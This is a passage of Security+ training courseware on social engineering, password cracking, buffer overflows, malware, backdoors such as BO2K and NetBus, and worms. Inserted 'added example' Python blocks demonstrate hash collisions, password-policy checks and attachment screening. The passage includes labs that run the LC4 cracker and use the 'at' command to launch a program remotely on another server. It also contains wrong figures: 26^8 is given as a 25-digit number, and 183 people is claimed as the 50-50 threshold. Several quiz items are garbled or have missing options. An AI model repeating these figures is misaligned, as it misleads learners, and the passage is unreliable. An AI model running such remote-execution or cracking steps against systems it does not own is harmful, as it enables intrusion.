- Identify which employees are out of town at a particular time.
- Provide all sorts of useful information; for example, hard drives might be restored.
- Include the exact information that attackers might seek, including the IP addresses of key assets, network topologies, locations of firewalls and intrusion detection systems, operating systems, applications in use, and more.
Online attacks
Online attacks use chat and e-mail venues to exploit trust relationships. Similar to the Trojan attacks, attackers might try to induce their victims to execute a piece of code by convincing them that they need it (You have an IRC virus, and you have to run this program to remove it; otherwise you'll be banned from this group) or that it's interesting (a game, for example). Most users are more aware of hackers when they are online, and are careful about divulging information in chat sessions and e-mail. If a hacker can manage to get a small program installed on a user's machine, he might be able to trick the user into reentering a username and password into a pop-up window.
Social engineering countermeasures
There are a number of steps that organizations can take to protect themselves against social-engineering attacks. At the heart of all of these countermeasures is a solid organizational policy that dictates expected behaviors and communicates security needs to every person in the company.
1 Take proper care of trash and other discarded items.
- For all types of sensitive information on paper, use a paper shredder or locked recycle box instead of a trash can.
- Ensure that all magnetic media is bulk erased before it is discarded.
- Keep trash dumpsters in secured areas so that no one has access to their contents.
2 Ensure that all system users have periodic training about network security.
- Make employees aware of social engineering scams and how they work.
- Inform users about your organization's password policy (for example, never give your password out to anybody at all, by any means at all).
- Give recognition to people who have avoided making mistakes or caught real mistakes in a situation that might have been a social-engineering attack.
- Ensure people know what to do in the event they spot a social-engineering attack.
Do it!
F-1:
- Use a paper shredder or locked recycle box
- Teach employees to construct strong passwords
- Add a firewall
- Keep trash dumpsters in secured areas
B C
D
- Make employees aware of social engineering scams and how they work
- Inform users about your organization's password policy
- Give recognition to people who have avoided making mistakes or caught real mistakes in a situation that might have been a social-engineering attack
- Ensure people know what to do in the event they spot a social-engineering attack
Encryption
Explanation
Encryption is a method used to encode a plaintext file so that only the intended recipient can read the original contents. This is usually accomplished using a complex algorithm and a key; the two are used to encode the original, readable version into an encrypted file and then to decode the encrypted file back into its original form.
Weak keys
Weak keys are secret keys used in encryption that are easily cracked. Their vulnerability might be due to weak algorithms or to keys that are too simple. For example, as computer processing capabilities have increased, encryption keys have grown in size and complexity from 40 and 56 bits to 128 and even 256 bits. Hackers will continue to try to break encryption standards. The best practice is to use the strongest encryption standards and algorithms available, along with strong keys.
Mathematical attacks
A mathematical attack on a cryptographic algorithm uses the mathematical properties of the algorithm to decrypt data or discover its secret keys. This is done by using computations, which is a much faster method than guessing. The process of creating mathematical attacks on cryptographic systems is called cryptanalysis, which is traditionally broken into three categories, depending on the type of information available to the analyst. The categories are listed in order of increasing advantage to the analyst. Strong algorithms are expected to be able to withstand even chosen plaintext attacks.
- Ciphertext-only analysis: The analyst has only the encrypted form of the data and no information about its cleartext (pre-encrypted) content.
- Known plaintext attack: The analyst has available some number of messages in both unencrypted and encrypted form.
- Chosen plaintext attack: The analyst has the ability to cause any message they wish to be encrypted.
Birthday attack
A birthday attack refers to a class of brute-force mathematical attacks that exploits the mathematical weaknesses of hash algorithms and one-way hash functions. It gets its name from the surprising fact that the probability that two or more people in a group of 23 share the same birthday is greater than fifty percent. You would need about 183 people in the same room to get a 50-50 chance that a person shares the same birthday as you. The difference is that in the first case, two people share any of 365 possible birthdays. In the second case, you're looking for two people that share a single predefined birthday. This effect is called the birthday paradox. The birthday attack is one of the most significant attacks against the integrity of digital signature schemes.
Here's the theory behind the birthday attack: Take some function (for example, a hash function) and supply it with a random input repeatedly. If the function returns one of k equally likely values, then by repeatedly evaluating the function for different inputs, statistically we expect to obtain the same output after about 1.2*k^(1/2) inputs (that is, 1.2 times the square root of k). For the birthday paradox, replace k with 365.
Birthday attacks are often used to find collisions (two inputs that result in the same hash value) of hash functions and are useful because they reveal mathematical weaknesses that can be used to compromise the hash. This is a much, much faster approach (compare 183 to 23 in the earlier birthday example) than the brute force technique of trying every possible combination.
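The arithmetic behind the birthday paradox, and the 1.2*k^(1/2) estimate, can be checked directly. The following is an added example, not from the courseware: it computes the two birthday probabilities the text contrasts, evaluates the expected number of inputs for a given k, and then runs a collision search against SHA-256 deliberately truncated to a small number of bits so that k is small enough to search in well under a second. The truncation width is a parameter of this demonstration only; it says nothing about full-length SHA-256, and the point for a defender is that a hash whose output space is 2^n offers only about 2^(n/2) work against collisions.

```python
# Added example (not from the courseware): birthday arithmetic plus an
# empirical collision search over a deliberately truncated hash.
import hashlib
import itertools
import math


def p_any_pair_shares(n, k=365):
    """Probability that at least two of n people share one of k birthdays."""
    p_all_distinct = 1.0
    for i in range(n):
        p_all_distinct *= (k - i) / k
    return 1.0 - p_all_distinct


def p_someone_matches_mine(n, k=365):
    """Probability that at least one of n other people has one fixed birthday."""
    return 1.0 - (1.0 - 1.0 / k) ** n


def expected_inputs(k):
    """Inputs needed before a repeated output is expected: the text's 1.2*k^(1/2)."""
    return 1.2 * math.sqrt(k)


def truncated_hash(msg, bits):
    """SHA-256 of msg keeping only the top `bits` bits, i.e. a hash with k = 2**bits outputs."""
    return int.from_bytes(hashlib.sha256(msg).digest(), "big") >> (256 - bits)


def find_collision(bits):
    """Feed a counter through the truncated hash until two distinct inputs agree.

    Returns (inputs_tried, input_a, input_b).  Storing every output seen so far
    is what turns a 2**bits brute-force search into a roughly 2**(bits/2) one.
    """
    seen = {}
    for i in itertools.count():
        msg = f"input-{i}".encode()
        tag = truncated_hash(msg, bits)
        if tag in seen:
            return i + 1, seen[tag], msg
        seen[tag] = msg


def demo(bits=20):
    """Compare the birthday numbers with a collision search over a 2**bits space."""
    tried, a, b = find_collision(bits)
    return {
        "p_23_people_share": round(p_any_pair_shares(23), 3),
        "p_183_match_mine": round(p_someone_matches_mine(183), 3),
        "expected_for_k_365": round(expected_inputs(365), 1),
        "expected_for_k_2^bits": round(expected_inputs(2 ** bits)),
        "brute_force_for_k_2^bits": 2 ** bits,
        "inputs_tried": tried,
        "colliding_inputs": (a.decode(), b.decode()),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Running demo() several times with different bit widths shows inputs_tried tracking expected_for_k_2^bits rather than brute_force_for_k_2^bits, which is the whole reason digital signature schemes need hash outputs far wider than the collision resistance they are meant to deliver.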
Password guessing
Password guessing is another attack that seeks to circumvent normal authentication systems by guessing the victim's password. This can actually be a trivial operation in some cases. For example, the Microsoft Windows operating system stores username and password information in a SAM file located in the system directory. If attackers can gain access to the SAM file, they can immediately determine the user accounts (logon IDs) configured on the machine in question, and can then use brute force or dictionary password guessing tools on it to determine the users' passwords. This can take some time if the user has selected a strong password, but can take substantially less time if the user has selected a common English word that can be determined by using a dictionary attack. One well-known commercial tool for assessing user passwords is called L0phtCrack after the hacker group named L0pht. (L0pht is now part of the security firm @stake.) This tool has a number of features, including the ability to conduct the brute force and dictionary attacks on Windows passwords outlined below.
Brute force
The brute force approach to password guessing generates every possible combination of keystrokes that could be included in a password, and passes each possible combination one by one through the password hash function in order to crack the victim's password. For example, a hacker attempting to crack a five-letter password of all uppercase letters might try AAAAA, BAAAA, CAAAA, and so on until the victim's password is discovered. The brute force approach is effective compared to the dictionary attack, because it can crack any password, regardless of whether or not it is an English word that could be vulnerable to the dictionary attack. A brute force attack is computationally very intensive, and can therefore take some time to complete. For example, an 8-character password that uses only uppercase letters would require 26^8 or 302,231,454,903,657,293,676,544 possible combinations. If the password could use lowercase and numeric characters as well as uppercase ones, then the number of possible combinations jumps up to (26+26+10)^8 or 62^8 combinations, which is a much higher number and would therefore take much longer to run through all possible combinations. Of course, the attackers could get lucky. If they stumble across the victim's password early on, the time required to crack the password could be dramatically shorter, as would be the case if the victim's password is BAAAA.
Dictionary
The dictionary approach to password cracking uses a predetermined list of words, typically normal English words and some variations, as input to the password hash. A dictionary password-cracking tool resolves the hash for each word in its list and then compares the hash against the user's password hash, one by one. When the two match, the password has been cracked. The dictionary attack only works against poorly chosen passwords.
For this reason, it's important that organizations put in place a policy that dictates users choose strong passwords that are not susceptible to this type of attack. Strong passwords are generally at least eight characters and use a mixture of uppercase, lowercase, numeric, and special characters. It is unlikely that an attacker's word list includes this type of password, although poorly chosen passwords that meet the above criteria might still be in a hacker's word list. The word p@55w0rd (password, spelled using the well-known hacker style) would be a bad choice for a password because it might be included in an attacker's word list.
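The policy just described can be enforced at the point where a password is chosen, which is where a defender gets to act before any cracking tool does. The following is an added example, not from the courseware and not a feature of L0phtCrack or of Windows: it sizes the keyspace a brute-force search would have to cover for a given length and alphabet, requires the four character classes, and undoes the p@55w0rd-style substitutions before comparing against a word list, so a leet-spelled dictionary word is refused as well. The word list and the substitution table are constructed stand-ins for the far larger lists real tools ship with.

```python
# Added example (not from the courseware): a password-policy check that
# applies the text's rules and refuses dictionary words even when they are
# spelled with symbol-for-letter substitutions.
import string

# Common symbol-for-letter substitutions, mapped back to the letter they imitate (constructed sample).
LEET = str.maketrans({"@": "a", "4": "a", "3": "e", "1": "l", "!": "i",
                      "0": "o", "5": "s", "$": "s", "7": "t"})

# Constructed stand-in for an attacker's word list.
CONSTRUCTED_WORDLIST = {"password", "letmein", "welcome", "qwerty", "monkey"}


def keyspace(length, uppercase=True, lowercase=False, digits=False, special=False):
    """Number of candidates a brute-force search must try for this length and alphabet."""
    alphabet = (26 * uppercase + 26 * lowercase + 10 * digits
                + len(string.punctuation) * special)
    return alphabet ** length


def character_classes(pw):
    """Which of the four classes (uppercase, lowercase, digit, special) the password uses."""
    classes = set()
    for ch in pw:
        if ch.isupper():
            classes.add("uppercase")
        elif ch.islower():
            classes.add("lowercase")
        elif ch.isdigit():
            classes.add("digit")
        else:
            classes.add("special")
    return classes


def dictionary_base(pw):
    """The form a word list would hold: lower-case, trailing digits removed, leet undone."""
    return pw.lower().rstrip(string.digits).translate(LEET)


def check_password(pw, wordlist=CONSTRUCTED_WORDLIST):
    """Return the list of policy problems; an empty list means the password passes."""
    problems = []
    if len(pw) < 8:
        problems.append("shorter than 8 characters")
    missing = {"uppercase", "lowercase", "digit", "special"} - character_classes(pw)
    if missing:
        problems.append("missing character classes: " + ", ".join(sorted(missing)))
    if dictionary_base(pw) in wordlist:
        problems.append("dictionary word once leet substitutions are undone")
    return problems


if __name__ == "__main__":
    print("uppercase-only, 8 chars:", keyspace(8))
    print("upper+lower+digits, 8 chars:", keyspace(8, uppercase=True, lowercase=True, digits=True))
    for candidate in ["AAAAA", "p@55w0rd", "Tr0ub4dor&3Xq"]:
        print(candidate, "->", check_password(candidate) or "ok")
```

The keyspace figures this prints are the exact values of 26^8 and 62^8; the checker deliberately reports every failing rule rather than stopping at the first, so a user sees everything that needs fixing at once.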
G-1:
Here's how
1 Follow the instructor's directions (see the classroom setup instructions for the location of the download file)
2 Install the program
3 Click Start and choose All Programs, LC4, LC4 (this opens the LC4 Trial Version window)
4 Click Trial; click Next
5 In the Get Encrypted Passwords window, verify that Retrieve from the local machine is selected; click Next
6 In the Choose Auditing Method window, select Strong Password Audit; click Next
7 In the Pick Reporting Style window, select all options; click Next; click Finish (this begins auditing; LC4 will successfully decode the simpler passwords on your system)
8 Close the LC4 program window
LC4 has the capability of doing a brute force attack on passwords, which will find all passwords given enough time. The trial version, however, does not do the brute force attack, so it finds only the most vulnerable passwords.
Do it! G-2:
2 The brute force approach to password guessing generates every possible combination of keystrokes that could be included in a password. True or false?
True
3 What type of attack will use properties of the cryptographic algorithm to discover its secret keys? A
B
C D
Vulnerabilities in software
Explanation
The term exploit is often used to mean any type of attack on a computer system, but software exploitation in the true sense means a penetration of security through vulnerabilities in software. This term casts a wide net, but generally applies to all tools and tricks that take advantage of vulnerabilities in software, whether logic errors or buffer overflows. The majority of successful attacks which use software exploits take advantage of well-known vulnerabilities, such as ones that are publicly known, and ones for which patches and fixes are readily available from their vendors, usually by download over the Internet. An excellent example of this is the wave of worms that exploited Microsoft's IIS Server in the summer of 2001. Code Red, Nimda, and Code Red II used, and continue to successfully use, vulnerabilities that have received national press and for which fixes have been available for some time now. These worms have severely impacted the Internet by congesting links with attack traffic and crashing Internet routers, and the worms have severely impacted the businesses that have been hit by them. This points to a continued pattern of indifference to security issues on the part of system administrators, according to a study by Gartner Research in May of 2002.
As software is tested by industry experts to assess its level of security and vulnerabilities are identified, the vendor is notified and given time to address the issue before the public is made aware. In this way, users of the product are given an opportunity to protect their systems with vendor-provided fixes and patches before attack tools are generated that can be operated by those with script kiddie-level skills.
Buffer overflows
Buffer overflows are a very common type of vulnerability and are frequently exploited on the Internet to gain access to systems. This type of attack works in the following manner. Whenever software accepts any type of data from a user or another application, it allocates memory for that data. If the data that is passed to the software is too large to fit into the allocated memory (the buffer), the data could overwrite areas of memory reserved for other processes, including the stack. What results is a buffer overflow, which can have a variety of consequences including application crashes, operating system crashes, or no effect at all; or it could result in a situation in which the attacker can cause his own code to be executed on the system. In this case, the attacker's buffer overflow could give the attacker access to the system.
Countermeasures
The key to stopping software exploits against your critical systems is to stay apprised of the latest security patches provided by your software vendors. Most vendors provide mailing lists for this purpose, so customers can be immediately aware of security issues associated with their products, as well as the fixes for those problems. Most security patches are readily available free of charge. Microsoft provides a number of free tools and services to Windows users in order for users of their products to stay abreast of the frequent security updates for their product. Perhaps the most accessible method, found at windowsupdate.microsoft.com, is an automated tool that can examine a Windows machine and identify the latest security and product updates needed for that particular machine. Other tools include the Microsoft Baseline Security Analyzer (MBSA), which identifies critical patches that have not been installed on Windows servers. For more information, go to www.microsoft.com/security.
Malicious software
Malicious software, or malware, is a catchall term for programs such as viruses, worms, Trojan horses, and backdoor programs that either have negative behaviors or are used by attackers to further their goals. The primary difference between the various types of malware is their means of spreading. The following table outlines the primary differences between worms, viruses, and Trojan horses; more precise explanations are given in each of the following sections:
Viruses
Viruses are self-replicating programs that spread by infecting other programs. Viruses copy themselves into other programs and change them (or their environments) so that, when the infected program is run, the virus is also executed and has the opportunity to spread the infection to other programs. The host program or executable can be any binary file, script, or code that has the opportunity to modify other programs. A virus can infect an executable binary, a Visual Basic script embedded in a text document or spreadsheet, or a script for IRC (Internet Relay Chat) clients such as Pirch or mIRC. It's important to remember that programs do not have to actually modify an executable itself to be categorized as viruses. Self-replicating programs that modify the behavior of the host program or its environment are also clearly viruses. For example, a virus might cause an e-mail client to mail a copy of the virus to every user in the client's address book without actually modifying the e-mail client's code.
Types of viruses
The number, variety, and frequency of new viruses are astounding. A visit to one of the many online virus databases reveals new viruses being discovered on a daily basis. The following table provides just a sampling of virus databases:
Product: Network Associates (McAfee)
URL: http://vil.nai.com/VIL/default.asp
Product: Symantec
URL: http://securityresponse.symantec.com/avcenter/vinfodb.html
Product: Computer Associates
URL: www3.ca.com/virus/encyclopedia.asp
Product: Trend Micro
URL: www.antivirus.com/vinfo/virusencyclo/
The viruses can be categorized according to type. The following table lists the predominant virus types:
Boot sector: Spread by infecting floppy or hard disk boot sectors; when an infected disk is booted, the virus is loaded into memory and attempts to infect the hard disk and all floppy disks inserted into the computer.
File infector: A class called parasitic viruses because they must infect other programs; file infectors copy themselves into other programs. When an infected file is executed, the virus is loaded into memory and tries to infect other executables. File types commonly infected include: *.exe, *.drv, *.dll, *.bin, *.ovl, *.sys, *.com.
Boot sector and file infector combined: Propagated by using both boot sector and file infector methods.
Macro: Currently accounting for the vast majority of viruses, macro viruses are application specific as opposed to OS specific and propagate very rapidly via e-mail. Many macro viruses are Visual Basic scripts that exploit commonly used Microsoft applications such as Word, Excel, and Outlook.
Companion: Instead of modifying an existing program, the companion virus uses the DOS 8.3 naming system to disguise itself as a program with the same name but a different extension. For example, a virus might name itself solitaire.com to emulate the solitaire.exe program. The .com file executes before an .exe file of the same name. The virus then runs the real program so it appears as if everything is normal.
Polymorphic: Changes or mutates as it copies itself to other files or programs. The goal is to make it difficult to detect and remove the virus.
Metamorphic: Similar to polymorphic, but recompiles itself into a new form, so the code keeps changing from generation to generation.
Propagation techniques
Antivirus software and online scanning services have become more commonplace, so viruses must spread quickly if they are to spread at all. To accomplish this, viruses combine mass mailing techniques (sending copies of itself to all recipients in the infected host's address book) with file infectors and worm techniques. Mass mailing techniques allow each instance of the virus to infect potentially hundreds of hosts. The following table outlines some of the methods that virus writers are using to spread their viruses:
- Mass mailer targeting all recipients in the victim's address book, in multiple activations.
- Mass mailer incorporating file infector, sharing network, and backdoor features.
- Mass mailer, also incorporating file infector, sharing network, backdoor process, and IIS infector methods.
- Spread through built-in SMTP client and local Windows network shares.
- Spread through MSN Messenger.
The major trend in viruses is that virus writers are adapting to more fully exploit the Internet's functionality. Boot sector viruses, previously the most prevalent virus type, have been supplanted by worms and macro viruses that take advantage of the increasingly interconnected computing environments. Instead of slowly infecting machines as floppy disks are swapped and shared, viruses can now spread virulently enough to have a global impact in a matter of days or weeks via the Internet.
Costs
Viruses are incredibly damaging and costly. Some viruses carry a payload that is designed to erase files, format disks, or exhibit other undesired symptoms. Even viruses that do not have these qualities have extremely negative consequences. This is because viruses typically have consequences unintended by the virus writer. For obvious reasons, virus writers do not perform compatibility testing. When the virus spreads into systems with differing software packages or OS flavors, it can have unforeseen impacts which can range from slow system response times to causing the infected system to crash. When a virus becomes widespread, it causes very large productivity losses in businesses around the world as computer users struggle with their infected machines. Widespread infections can also result in what is effectively a denial-of-service (DoS) attack on mail servers, which can be brought to a grinding halt as they are swamped with a huge volume of virus-generated messages. Additional costs are incurred as system administrators have to spend time battling the infection and removing it from computers. Virus removal can often be a difficult and time-consuming process. The cleanup process itself can inadvertently cause additional damage to the computer system because administrators often have to replace important system files that are infected by the virus. Businesses can incur a significant cost in terms of goodwill and reputation if they are infected with a virus.
Countermeasures
A number of vendors provide enterprise virus protection solutions that can effectively filter known viruses, Trojan horses, and worms. These solutions include desktop antivirus programs, virus filters for e-mail servers, and network appliances that detect and remove viruses. Best practices dictate that large organizations need a multi-layered security approach that defends against malware from all points of entry to the network. This means that no single solution is enough: virus solutions at network gateways, desktops, and on e-mail servers (both internally and on network Demilitarized Zones) are needed to best protect the enterprise's productivity and information assets.
Item: Antivirus products
Description: Install products from multiple vendors. Some suppliers offer a fix for a given new virus before others, so by using multiple products, your organization can have the fix for new viruses sooner. Keep virus signature databases up to date on both desktop computers and servers. Use automated systems to automatically download and install the latest signatures. Stress the importance of virus database update subscriptions so new software does not have to be purchased when an outbreak occurs.
Item: Policies and procedures
Description: Define an organizational policy that clearly states proper use of e-mail and network resources, and ensures that computer users receive training on safe computing habits.
Item: Software updates and patches
Description: Keep machines, and especially servers, up to date with security patches to ensure their systems are not vulnerable to well-known exploits.
Item: User education
Description: Instruct users to never download any file from an unknown source. If a program is double-clicked even once, even for a moment to check it out, the computer can be infected. Caution users about executable files sent to them even from friends and co-workers. In general, there is little need to send executables via e-mail. Users should always check with the source before running the executable.
Item: Configure servers
Description: Many e-mail servers can automatically disable forwarding of dangerous file types by e-mail to prevent the spread of viruses and other malware.
Trojan horses
According to legend, the ancient Greeks tricked the Trojans into admitting the Greek army by offering them a wooden statue of a horse as a gift. Once the Trojans had pulled the horse behind the city's fortifications, the Greek soldiers who were stowed away inside were able to gain access and conquer the city of Troy. Likewise, the makers of Trojan horse programs gain access to their victims' computers by tricking them into running their malware by presenting the program as something useful or beneficial. The candy used to induce users to run the Trojan horse can include anything someone might find interesting: games, pictures, MP3s, screen savers, or pornography (one famous Trojan was entitled Naked Wife). When the unwitting user runs the program, it can wreak havoc with any number of methods including:
- Sending copies of itself to all recipients in the user's address book
- Deleting or modifying files
- Installing backdoor/remote control programs
Most Trojan horses install themselves silently; users often don't realize they've been infected until they receive an e-mail from someone saying an e-mail they have received from the user was infected with a Trojan. In the meantime, the attacker might have already collected password files or uploaded additional tools to use the victim's computers for DDoS attacks.
Propagation techniques
Many viruses are categorized as Trojan horses because they use some sort of social engineering to induce the victim into running the attacker's program. Because most modern e-mail clients do not allow programs contained in e-mail messages to execute automatically, viruses that spread by e-mail cannot multiply without user intervention. One feature of the Windows operating system that can be used to trick users into running Trojan horses is the Hide file extensions of known file types option. By default, Microsoft Windows hides file extensions, which can cause files to appear to be a different file type than they actually are. If file name extensions are hidden, then the file Reunion.jpg.exe will look like Reunion.jpg. This can trick users into executing Trojan horses.
Countermeasures
Implement a clear organizational policy regarding e-mail attachments and train users regarding the policy. Install antivirus programs on each client and maintain current signature files.
Do it!
H-1:
- A virus that recompiles itself into a new form from generation to generation.
- A virus that changes itself as it copies to other files or programs.
- A virus that spreads by infecting the hard boot sector or floppy disks.
- A virus that presents itself as a useful or beneficial program in order to trick the user into executing it.
C D
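The Reunion.jpg.exe trick in the Trojan propagation section, the companion-virus naming in the virus table, and the "configure servers to disable dangerous file types" countermeasure all come down to looking at a file name's extensions. The following is an added example, not from the courseware and not a feature of any particular mail server: an attachment-screening rule that blocks executable file types, calls out a decoy extension placed in front of the real one, and shows what a user with hidden extensions would have seen. The extension sets are a constructed sample, not a complete policy.

```python
# Added example (not from the courseware): attachment screening by extension.
import pathlib

# File types that run code when opened; a real policy would be longer (constructed sample).
EXECUTABLE_EXTENSIONS = {".exe", ".com", ".scr", ".pif", ".bat", ".cmd", ".vbs", ".js"}
# Harmless-looking types placed in front of a real executable extension (constructed sample).
DECOY_EXTENSIONS = {".jpg", ".jpeg", ".gif", ".png", ".txt", ".doc", ".pdf", ".mp3"}


def extensions(filename):
    """All dot-suffixes of a name, lower-cased: 'Reunion.jpg.exe' -> ['.jpg', '.exe']."""
    return [s.lower() for s in pathlib.PurePosixPath(filename).suffixes]


def displayed_name(filename):
    """What a user sees when known extensions are hidden: the last extension is dropped."""
    return pathlib.PurePosixPath(filename).stem


def screen_attachment(filename):
    """Return ('allow', '') or ('block', reason) for one attachment name."""
    exts = extensions(filename)
    if not exts or exts[-1] not in EXECUTABLE_EXTENSIONS:
        return "allow", ""
    final = exts[-1]
    decoys = [e for e in exts[:-1] if e in DECOY_EXTENSIONS]
    if decoys:
        return "block", (f"executable ({final}) disguised with decoy extension {decoys[-1]}; "
                         f"shown to users as {displayed_name(filename)}")
    return "block", f"executable file type ({final})"


def screen_mailbox(filenames):
    """Apply the rule to every attachment name and report the verdicts."""
    return {name: screen_attachment(name) for name in filenames}


# Constructed sample of attachment names as a mail server might see them.
CONSTRUCTED_ATTACHMENTS = ["Reunion.jpg.exe", "holiday.jpg", "solitaire.com",
                           "budget.xlsx", "notes.TXT.vbs", "README"]

if __name__ == "__main__":
    for name, (verdict, reason) in screen_mailbox(CONSTRUCTED_ATTACHMENTS).items():
        print(f"{name:16} {verdict:5} {reason}")
```

The rule keys on the last extension because that is the one the operating system uses to decide how to open the file; the decoy check only adds an explanation, it never changes the verdict.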
Backdoor
Explanation
A backdoor is a piece of malicious software, or malware, that allows a malevolent user to gain remote access without the knowledge or permission of its owner. Also known as remote access Trojans, these programs allow an attacker to connect to the compromised computer locally or over the Internet and, depending on the type of backdoor installed, issue a wide variety of commands. Although some machines compromised with backdoor programs are used to store files and applications such as hacks and exploits for later use, they can also be used as handlers in a distributed denial-of-service attack.
Trojan.VirtualRoot
Backdoor programs can be installed on victim machines by any number of methods: Trojans or other social engineering methods, worms, viruses, or manually by exploiting vulnerabilities and uploading the remote control software. One recent threat using a backdoor is the Code Red II worm, which exploits a vulnerability in Microsoft IIS servers to gain entry, installs remote access software called Trojan.VirtualRoot, and continues to spread to other machines. This type of attack is typical of the recent trend of blended threats. Once the Trojan.VirtualRoot backdoor has been installed, the server can be controlled remotely.
Back Orifice 2000
One of the more famous remote access control/backdoor programs is Back Orifice 2000 (BO2K), mockingly named after Microsoft's Back Office 2000 product suite. Produced by a hacker group called Cult of the Dead Cow (www.cultdeadcow.com), BO2K is offered as a remote administration tool, although its lightweight and unobtrusive nature allows it to be surreptitiously installed on a victim's computer without his or her knowledge. After the BO2K server (only 40K) is configured, as shown in Exhibit 3-8, and installed on the compromised system, it immediately buries itself in the Windows system directory and runs itself silently every time the computer is rebooted.
A remote attacker can then connect to the compromised machine by using the BO2K client GUI and issue any number of commands. Plug-ins are available for BO2K that allow the hacker to view the compromised computer's desktop and move the mouse pointer. It is even possible for the remote attacker to activate the victim's video camera and microphone, thereby monitoring everything, and everyone, in front of the computer. BO2K runs on most Windows systems and is currently being used on other operating systems. For more information about the tool, see the following Web site:
http://sourceforge.net/projects/bo2k/
NetBus
NetBus is an earlier remote control/backdoor tool that has similar functionality to that of BO2K. Like other such programs, NetBus is often the payload of a Trojan horse or worm that gives hackers the ability to connect to the compromised machine over the Internet and issue a variety of commands. Some of the commands seem to be included in the feature set more for their ability to impress the unassuming victim than to be useful. A list of NetBus commands is shown in Exhibit 3-9.
Backdoor and remote access programs such as BO2K and NetBus are easily detected and eliminated by antivirus software and are otherwise thwarted by using the same mechanisms as used against Trojan horses and viruses. For this reason, it is important to implement an effective virus screening solution on all servers and desktop computers, as well as to educate computer users about the danger of e-mailed viruses and Trojan horses. In addition to these regimens, critical e-commerce servers should be equipped with host-based intrusion detection systems to block attacks that result in the installation of backdoors. Backdoor traffic can also be spotted by network-based intrusion detection systems, although some backdoors encrypt their traffic to bypass network IDS signature detection.
Do it!

H-2:

Here's how / Here's why

For this activity, students will work in pairs. Each partnership will use two machines, Server-X and Server-Y. Instruct students to substitute their server's hostname for Server-X and their partner's server hostname for Server-Y.

2 Press Ctrl+Alt+Delete, click Task Manager, and activate the Processes tab
(To open the Windows Task Manager and view the current processes. Look for notepad.exe. You should not see it.)
3 On Server-Y, log in as Administrator
4 Open a command prompt window
5 Enter the following command:
net time \\server-x
(To learn the current time for Server-X so you can schedule the execution of a program.)
Enter the following command, where the value for <time> is 3 minutes after the current time for Server-X:
at \\server-x <time> /interactive "notepad.exe"
(The command at \\server-x 3:49p /interactive notepad.exe, for example, will launch Notepad in an interactive window at 3:49 PM on Server-X.)

Attacks and malicious code

8 At Server-X, after the time specified in the command lapses, check Windows Task Manager and view the processes
9 Check the Server-X desktop for the Notepad application
10 Close Task Manager and Notepad on Server-X and the command window on Server-Y
Logic bombs
Explanation
Another category of malicious code is known as a logic bomb. A logic bomb is a set of computer instructions that lie dormant until triggered by a specific event. That event can be almost anything, such as opening a document, launching a program, pressing a key a certain number of times, or an action that the computer has taken. Once the logic bomb is triggered, it performs a malicious task. Logic bombs might reside within stand-alone programs as Trojan horses, or they might be part of a computer virus. This makes them almost impossible to detect until after they are triggered and the damage is done.

Logic bombs are often the work of former employees. One logic bomb caused a company's computerized accounting system to be corrupted. It was triggered by an instruction to check the corporate salary database every three months; if the programmer's name was not found, the logic bomb was instructed to launch. Another logic bomb was the work of an independent computer consultant hired to write a program. His intention was to return after the logic bomb was triggered and be paid a large consulting fee to fix the problem.

On personal computers, a prominent type of logic bomb is known as a macro virus. A macro virus uses the auto-execution feature of specific application programs, such as Microsoft Word. Whenever Word is launched, the virus is triggered and performs a malicious act.
Worms
Starting in mid-2001, worms surpassed DoS attacks as the primary type of malicious activity on the Internet. The release of the Code Red worm in the summer of 2001, shortly followed by Code Red II and Nimda, brought about a sea change in the type of attacks that security administrators need to fend off. Although the term worm has a few different commonly used meanings, the classic worm or real worm is defined as a self-contained program that uses security flaws such as buffer overflows to remotely compromise a victim and replicates itself to that system. Unlike viruses, true worms do not infect other executable programs; instead, they install themselves on the victim computer system as a stand-alone entity that does not require the execution of an infected application.

Melissa
The term e-mail worm has also been used informally to mean a virus that spreads through external network connections, emphasizing the threat posed by mass-mailing viruses. The Word97Macro/Melissa worm was perhaps the first well-known e-mail worm and the most famous virus to date. Melissa gained notoriety in March of 1999 as the first virus to send mass e-mails of itself by using the recipients in a user's address book.

Code Red
Although e-mail worms have become a common and very prevalent threat to networks, true worms such as Code Red have become even more common, accounting for 80% of all malicious activity on the Internet and bringing e-commerce networks to a standstill. Appearing in June of 2001, Code Red exploited a known vulnerability in Microsoft IIS 4.0 and 5.0. The worm operated by creating a random list of IP addresses, which it then scanned for the IIS vulnerability. If the worm found a target system with the vulnerability, it executed the buffer overflow exploit, which resulted in the worm's code being loaded onto and executed by the victim system.
The worm then began to propagate itself from the newly compromised machine. After two hours, the worm changed the server's Web page. The Code Red worm also tried to perform a denial-of-service attack on the IP address of www.whitehouse.gov, but the threat was averted by simply changing the domain's IP address. Since Code Red did not store itself in any files, the worm could be removed from infected systems simply by rebooting the machine; however, servers would remain vulnerable to the attack and could be reinfected with Code Red until system administrators applied the necessary security patch provided by Microsoft. Although Code Red was programmed to go dormant shortly after its release, its successor worms, Code Red II and Nimda, continued to be a real threat to unpatched IIS servers over a year after their release.

Countermeasures
The method of true worms is to exploit known vulnerabilities in order to spread themselves; the key defense against these attacks is for system administrators to ensure all servers are patched with the latest security updates. Since Nimda can exploit a vulnerability in Internet Explorer to run an executable in a Web page or e-mail message without user intervention, system administrators must keep abreast of security issues affecting their users' desktop computers and ensure the required security patches are installed. Network-based and host-based intrusion detection systems (IDS) are also critical components needed to secure a network against remote attacks such as Code Red. A host-based IDS can detect unauthorized system activity and stop it before the server is infected. A network-based IDS can detect the signatures of known worms as well as the malicious activity generated by those worms, and can notify system administrators as well as instruct routers and firewalls to block traffic from the offending hosts. To protect against worm attacks that are propagated via e-mail, a comprehensive antivirus system should be implemented.
Make sure users have their e-mail set so it does not preview a message when selected. Instead, users should have to double-click the message and only then if they recognize the sender.
Review questions
1 Distributed denial-of-service attacks can involve which of the following? (Choose all that apply.)
A Zombies
B Birthday attack
C Handlers
D TFN2K

CompTIA Security+ Certification

2 Which of the following correctly outlines the normal setup of a TCP session?
A ACK, SYN, SYN/ACK
B SYN, ACK, RST
C
D ACK, RST, SYN/ACK

3 Identify each of the following as a DoS tool, backdoor, virus, or Trojan horse:
Item            Type
CodeRedII       Virus
Trin00          Tool
BO2K            Backdoor
Stacheldracht   Tool
Melissa         Virus

4 ARP poisoning affects which of the following? (Choose all that apply.)
A Hostname-to-IP address resolutions
B
C Domain name resolution
D Authentication requests

5 Man-in-the-middle attacks can be accomplished using which of the following?
A ICMP redirects
B NetBus
C ARP spoofing
D Replay attacks

6 Denial-of-service (DoS) attacks are a family of attack methods that make target systems unavailable to their legitimate users. True or false?
True

